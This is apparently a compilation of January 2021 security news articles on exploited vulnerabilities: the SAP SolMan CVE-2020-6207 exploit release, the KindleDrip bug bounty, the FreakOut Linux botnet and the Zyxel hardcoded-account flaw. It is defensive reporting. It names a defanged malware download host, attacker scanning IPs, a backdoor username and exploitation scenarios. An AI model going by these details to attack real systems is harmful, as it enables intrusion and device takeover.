Experts warn of an automated scanning activity for servers affected by vulnerabilities in SAP software, attackers started probing the systems after the release of an exploit for the critical CVE-2020-6207 flaw in SAP Solution Manager (SolMan), version 7.2.

“SAP Solution Manager (User Experience Monitoring), version- 7.2, due to Missing Authentication Check does not perform any authentication for a service resulting in complete compromise of all SMDAgents connected to the Solution Manager.” reads the advisory.

SAP Solution Manager is a product developed by the software company SAP SE, it offers end-to-end application lifecycle management to streamline business processes and proactively address improvement options, increasing efficiency and decreasing risk within SAP customers’ existing maintenance agreements and managing the application lifecycle.

The vulnerability resides in the EEM Manager component and is caused by a missing authentication check, it has been rated as critical and received the CVSS base score of 10.0.

A successful attack exploiting this vulnerability would put an organization’s mission-critical SAP applications, business process and data at risk—impacting cybersecurity and regulatory compliance.

“While exploits are released regularly online, this hasn’t been the case for SAP vulnerabilities, for which publicly available exploits have been limited.” reads a post published by Onapsis. “The release of a public exploit significantly increases the chance of an attack attempt since it also expands potential attackers not only to SAP-experts or professionals, but also to script-kiddies or less-experienced attackers that can now leverage public tools instead of creating their own.”
SolMan allows to centralize the management of all SAP and non-SAP systems that are within an SAP landscape. It performs multiple actions, including implementation, support, monitoring and maintenance of all enterprise mission-critical SAP applications, including ERP, CRM, HCM, SCM, BI, financials and others. If an attacker is able to gain access to SolMan, it could compromise any system connected to it.

In early 2020, experts from Onapsis Research Labs researchers reported that in default configurations, unauthenticated remote attackers could be able to execute operating system commands on the satellite systems and achieve full privileges on the associated SAP systems. SAP addressed the flaw in March 2020 (SAP Security note #2890213), so SAP customers who have proper patching in place shouldn’t be affected by this exploit.

A remote unauthenticated attacker could exploit this flaw to execute highly privileged administrative tasks in the connected SAP SMD Agents. Every system connected to the SolMan can be potentially affected.

Below some of the possible exploitation scenarios:

Shutting down any SAP system in the landscape (not only SAP SolMan)
Causing IT control deficiencies impacting financial integrity and privacy leading to regulatory compliance violations such as Sarbanes-Oxley (SOX), GDPR and others
Deleting any data in the SAP systems, including key data that can cause business disruption
Assigning superuser (e.g. SAP_ALL) privileges to any existing or new user, enabling those users to run business operations that would normally require specific privileges to bypass other Segregation of Duties (SoD) controls
Reading sensitive data from the database, including employee and customer personal information
Last week, Dmitry Chastuhin released a PoC exploit code for CVE-2020-6207 for educational purposes.

“This script allows to check and exploit missing authentication checks in SAP EEM servlet (tc~smd~agent~application~eem) that lead to RCE on SAP SMDAgents connected to SAP Solution Manager” read the description published on GitHub.

After the release of the exploit code, security researchers at Onapsis have observed a scanning activity in the wild for vulnerable systems.

Amazon Awards $18,000 for Exploit Allowing Kindle E-Reader Takeover
22.1.2021  Exploit  Securityweek

Amazon has awarded an $18,000 bug bounty for an exploit chain that could have allowed an attacker to take complete control of a Kindle e-reader simply by knowing the targeted user’s email address.

The attack, dubbed KindleDrip, was discovered in October 2020 by Yogev Bar-On, a researcher at Israel-based cybersecurity consulting firm Realmode Labs. KindleDrip involved the exploitation of three different security holes, all of which were addressed by Amazon.

The first vulnerability in the exploit chain was related to the “Send to Kindle” feature, which allows users to send an e-book in MOBI format to their Kindle device via email as an attachment. Amazon generates an @kindle.com email address where a user can send e-books as an attachment from a list of email addresses approved by the user.

Bar-On discovered that he could abuse this feature to send a specially crafted e-book that would allow him to execute arbitrary code on the targeted device. The malicious e-book achieved code execution by leveraging a vulnerability related to a library used by the Kindle to parse JPEG XR images. Exploitation required the user to click on a link inside an e-book that contained a malicious JPEG XR image, which would result in a web browser opening and the attacker’s code getting executed with limited privileges.

The researcher also discovered a vulnerability that allowed him to escalate privileges and execute the code as root, which gave him complete access to the device.

“The attacker could access device credentials and make purchases on the Kindle store using the victim’s credit card. Attackers could sell an e-book on the store and transfer money to their account,” Bar-On explained in a blog post. “At least the confirmation email would make the victim aware of the purchase.”

It's worth noting that an attacker could not gain access to actual credit card numbers or passwords through such an attack because this type of data is not stored on the device. Instead, they could obtain special tokens that can be used to access the victim's account.

An attacker would have only needed the targeted user’s email address and to convince the victim to click on a link inside the malicious e-book. While the Send to Kindle feature only allows users to send e-books from pre-approved email addresses, the researcher pointed out that an attacker could have simply used an email spoofing service. The prefix of the @kindle.com email address of the targeted user is in many cases the same as their regular email.

The security holes that required changes to the Kindle firmware — the code execution and privilege escalation issues — were patched in December with the release of version 5.13.4. Amazon now also sends a verification link to email addresses that cannot be authenticated, it adds a few characters to some email aliases to make them more difficult to guess, and systems are in place to prevent brute-forcing of the email address. Kindle users do not need to take any action.

A video has been published to show how a KindleDrip attack worked:

“The security of our devices and services is a top priority. We have already released an automatic software update over the Internet fixing this issue for all Amazon Kindle models released after 2014,” an Amazon spokesperson told SecurityWeek. “Other impacted Kindle models will also receive this fix. We also have measures in place to help prevent customers from receiving content they haven’t requested. We appreciate the work of independent researchers who help bring potential issues to our attention.”

Scanning Activity Detected After Release of Exploit for Critical SAP SolMan Flaw
21.1.2021  Exploit  Securityweek

A Russian researcher has made public on GitHub a functional exploit targeting a critical vulnerability that SAP patched in its Solution Manager product in March 2020.

Solution Manager (SolMan) was designed to provide central management for SAP and non-SAP systems and requires for Solution Manager Diagnostic Agent (SMDAgent) to be installed on each host, for the management of communications, monitoring, and diagnostics.

Tracked as CVE-2020-6207 and featuring a CVSS score of 10, the security flaw is a missing authorization check in the EEM Manager component of SolMan, which could allow an unauthenticated, remote attacker to execute operating system commands on hosts, as the SMDAgent.

The researcher who published the fully-functional exploit for the bug on GitHub claims the project is for educational purposes only, and that it “cannot be used for law violation or personal gain.”

Following the publication of the exploit, however, security researchers at Onapsis, a firm that specializes in securing SAP applications, have observed scanning in the wild for vulnerable systems.

It’s not common for proof-of-concept (PoC) exploits targeting SAP vulnerabilities to be made public, Onapsis says, adding that the availability of the code will likely result in an increase in exploitation attempts from both SAP-expert adversaries, and script kiddies.

“A successful attack exploiting this vulnerability would put an organization’s mission-critical SAP applications, business process and data at risk—impacting cybersecurity and regulatory compliance,” Onapsis notes.

Being an administrative system, SolMan “has connections and trust relationships with every SAP system throughout the landscape,” and an attacker able to compromise it would essentially gain access to any business system connected to it, the security firm warns.

Attackers looking to exploit the vulnerability need access to the SolMan HTTP(s) port. The remote attacker would gain control of the affected system with admin privileges, enabling them to conduct a wide range of activities.

“An attacker will need network visibility to SolMan as this system is not frequently exposed to the Internet. So for most companies, risk of this exploit should be mostly limited to internal attacks (unless external attackers have already compromised another system and are inside the network,” Onapsis explains.

Organizations that have already applied the available patches are not exposed to attacks leveraging this or other similar exploits. According to Onapsis, however, SolMan is often overlooked when it comes to patching, mainly because it does not hold any business information.

FreakOut! Ongoing Botnet Attack Exploiting Recent Linux Vulnerabilities

20.1.2021  BotNet  Exploit  Thehackernews
An ongoing malware campaign has been found exploiting recently disclosed vulnerabilities in network-attached storage (NAS) devices running on Linux systems to co-opt the machines into an IRC botnet for launching distributed denial-of-service (DDoS) attacks and mining Monero cryptocurrency.

The attacks deploy a new malware variant called "FreakOut" by leveraging critical flaws fixed in Laminas Project (formerly Zend Framework) and Liferay Portal as well as an unpatched security weakness in TerraMaster, according to Check Point Research's new analysis published today and shared with The Hacker News.

Attributing the malware to be the work of a long-time cybercrime hacker — who goes by the aliases Fl0urite and Freak on HackForums and Pastebin at least since 2015 — the researchers said the flaws — CVE-2020-28188, CVE-2021-3007, and CVE-2020-7961 — were weaponized to inject and execute malicious commands in the server.

Regardless of the vulnerabilities exploited, the end goal of the attacker appears to be to download and execute a Python script named "out.py" using Python 2, which reached end-of-life last year — implying that the threat actor is banking on the possibility that that victim devices have this deprecated version installed.

"The malware, downloaded from the site hxxp://gxbrowser[.]net, is an obfuscated Python script which contains polymorphic code, with the obfuscation changing each time the script is downloaded," the researchers said, adding the first attack attempting to download the file was observed on January 8.

And indeed, three days later, cybersecurity firm F5 Labs warned of a series of attacks targeting NAS devices from TerraMaster (CVE-2020-28188) and Liferay CMS (CVE-2020-7961) in an attempt to spread N3Cr0m0rPh IRC bot and Monero cryptocurrency miner.

An IRC Botnet is a collection of machines infected with malware that can be controlled remotely via an IRC channel to execute malicious commands.

In FreakOut's case, the compromised devices are configured to communicate with a hardcoded command-and-control (C2) server from where they receive command messages to execute.

The malware also comes with extensive capabilities that allow it to perform various tasks, including port scanning, information gathering, creation and sending of data packets, network sniffing, and DDoS and flooding.

Furthermore, the hosts can be commandeered as a part of a botnet operation for crypto-mining, spreading laterally across the network, and launching attacks on outside targets while masquerading as the victim company.

With hundreds of devices already infected within days of launching the attack, the researchers warn, FreakOut will ratchet up to higher levels in the near future.

For its part, TerraMaster is expected to patch the vulnerability in version 4.2.07. In the meantime, it's recommended that users upgrade to Liferay Portal 7.2 CE GA2 (7.2.1) or later and laminas-http 2.14.2 to mitigate the risk associated with the flaws.

"What we have identified is a live and ongoing cyber attack campaign targeting specific Linux users," said Adi Ikan, head of network cybersecurity Research at Check Point. "The attacker behind this campaign is very experienced in cybercrime and highly dangerous."

"The fact that some of the vulnerabilities exploited were just published, provides us all a good example for highlighting the significance of securing your network on an ongoing basis with the latest patches and updates."

Cybercriminals Ramp Up Exploits Against Serious Zyxel Flaw
7.1.2021  Exploit  Threatpost

More than 100,000 Zyxel networking products could be vulnerable to a hardcoded credential vulnerability (CVE-2020-29583) potentially allowing cybercriminal device takeover.

Security experts are warning hackers are ramping up attempts to exploit a high-severity vulnerability that may still reside in over 100,000 Zyxel Communications products.

Zyxel, a Taiwanese manufacturer of networking devices, on Dec. 23 warned of the flaw in its firmware (CVE-2020-29583) and released patches to address the issue. Zyxel devices are generally utilized by small businesses as firewalls and VPN gateways.

Fast forward to this week, several security researchers have spotted “opportunistic exploitation” of Zyxel devices that have not yet received updates addressing the vulnerability.

2020 Reader Survey: Share Your Feedback to Help Us Improve

“Likely due to the holidays, and maybe because [Niels Teusink, who discovered the flaw] did not initially publish the actual password, widespread exploitation via ssh has not started until now,” said Johannes Ullrich, of the SANS Internet Storm Center (ISC), in a Wednesday analysis. “But we are [now] seeing attempts to access our ssh honeypots via these default credentials.”

Ullrich said the scans started on Monday afternoon stemming from one IP (185.153.196.230), and more scans from other IPs (5.8.16.167, 45.155.205.86) joined throughout this week.

“The initial IPs scanning for this are all geo-locating back to Russia,” Ullrich told Threatpost. “But other than that, they are not specifically significant. Some of these IPs have been involved in similar internet wide scans for vulnerabilities before so they are likely part of some criminal’s infrastructure.”

Exploit attempts on a honeypot observed by SANS ISC. Credit: SANS ISC

Separately, researchers with GreyNoise said on Twitter, on Monday, they observed a slew of “opportunistic exploitation of the newly discovered Zyxel USG SSH Backdoor and crawling of SOHO Routers.”

The vulnerability stems from Zyxel devices containing an undocumented account (called zyfwp) that has an unchangeable password – which can be found in cleartext in the firmware, according to Niels Teusink at EYE, who discovered the flaw and published his analysis in tandem with Zyxel’s December advisory.

The flaw, which had a CVSS Score of 7.8 out of 10 (making it high severity), could be exploited by attackers to log in with administrative privileges – and ultimately take over affected devices.

From an attacker perspective, this would give cybercriminals the ability to adjust firewall rules, run malicious code on devices, or launch machine-in-the-middle attacks, Ullrich told Threatpost.

“This can easily be leveraged to compromise workstations protected by the firewall,” he said. “The only limit is the creativity of the attacker.”

The number of current devices open to attack cannot by specifically pinpointed, however, according to Teusink, globally more than 100,000 Zyxel devices have exposed their web interface to the internet.

Furthermore, “in our experience, most users of these devices will not update the firmware very often,” said Teusink. “Zyxel devices do not expose their firmware version to unauthenticated users, so determining if a device is vulnerable is a bit more difficult.”

Teusink did not reveal the unchangeable password in his analysis – however, it didn’t take long for the hardcoded credentials to be distributed publicly on Twitter.

Affected Zyxel devices include its ATP firewall series, Unified Security Gateway (USG) series and VPN series, a patch for which became available in December 2020. Also affected is the NXC2500 and NXC 5500, which are two devices that are part of Zyxel’s lineup of wireless LAN controllers, which will not receive a patch until Jan. 8, 2021.

Patch details. Credit: Zyxel

Ullrich told Threatpost that patching firewalls and gateways is always “tricky,” especially if the patching must be done remotely. And, another issue is that “due to the holidays, the initial announcement by Zyxel was also somewhat overlooked,” he noted.

Security experts’ advice for potentially affected users? “Update now,” emphasized Ullrich.

He said consumers or businesses using any kind of firewall, gateway or router, regardless of the vendor should limit the administrative interface exposure.

“Avoid exposing web-based admin interfaces,” said Ullrich. “Secure ssh access best you can (public keys…). In the case of a hidden admin account, these measures will likely not help, but see if you can disable password authentication. Of course, sometimes, vendors choose to hide ssh keys instead of passwords.”

CVE-2020-29583 is only the latest security issue to plague Zyxel.

In March 2020, researchers warned that Zyxel’s Cloud CNM SecuManager software contained 16 unpatched vulnerabilities that could kick open the doors for hackers to exploit. That same month, the Mirai botnet was discovered attacking Zyxel network-attached storage (NAS) devices using a critical vulnerability in the devices. And in April 2020, the Hoaxcalls botnet was found spreading via an unpatched vulnerability impacting the ZyXEL Cloud CNM SecuManager.

Hackers Exploiting Recently Disclosed Zyxel Vulnerability
6.1.2021  Exploit  Securityweek

Security researchers have observed the first attempts to compromise Zyxel devices using a recently disclosed vulnerability related to the existence of hardcoded credentials.

The attacks, currently small in numbers, target CVE-2020-29583, a vulnerability affecting several Zyxel firewalls and WLAN controllers that was publicly disclosed at the end of December.

Firmware updates that remove the bug are already available for some of the affected products, but attackers are seizing the moment, attempting to find vulnerable devices before patches have been applied.

Discovered by EYE security researchers, the issue impacts Zyxel USG, ATP, VPN, ZyWALL, and USG FLEX devices and exists because the password for the undocumented user account zyfwp is stored in the firmware in plaintext.

The account is meant for the automatic delivery of firmware updates over FTP and has admin privileges. Thus, attacks targeting vulnerable devices could lead to the compromise of entire networks, researchers warn.

Starting January 3, security researchers at GreyNoise, a company that collects and analyzes Internet-wide scan and attack data, observed the first attempts to exploit this so-called “backdoor account” on Zyxel devices, and they say the attacks do not appear to be targeted in nature, but rather opportunistic.

“Yesterday we saw one device start opportunistically attempting to login to servers on the internet over SSH using the ‘backdoor’ username and password disclosed by Zyxel for CVE-2020-29583. Today, we saw two more, bringing us to a total of three (3) devices,” GreyNoise founder Andrew Morris told SecurityWeek via email.

While these are clear attempts to find and compromise vulnerable Zyxel devices that are exposed to the Internet, attribution is not as straightforward.

“One or more individuals, groups, organizations, or botnet operators” could be behind the attempts, Morris pointed out.